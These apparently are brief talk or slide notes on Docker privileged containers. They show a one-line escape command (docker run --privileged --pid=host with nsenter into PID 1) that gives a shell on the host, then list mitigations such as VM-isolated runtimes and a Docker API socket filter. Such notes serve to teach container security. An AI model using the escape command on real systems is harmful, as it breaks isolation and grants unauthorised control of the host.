Privileged Containers

Privileged Containers

Privileged containers have access to all syscalls

If able to start containers, just leave the isolation:

docker run -it \
--privileged \
--pid=host \
alpine \
nsenter -t 1 -m -u -n -i sh

Parameters of nsenter

Taming Privileges Containers

For example

Isolates containers in a lightweight VM

Configured as a container runtime (instead of runc)

Docker Engine API Filter

For example sockguard

/sockguard -upstream-socket /var/run/docker-raw.sock -filename /var/run/docker.sock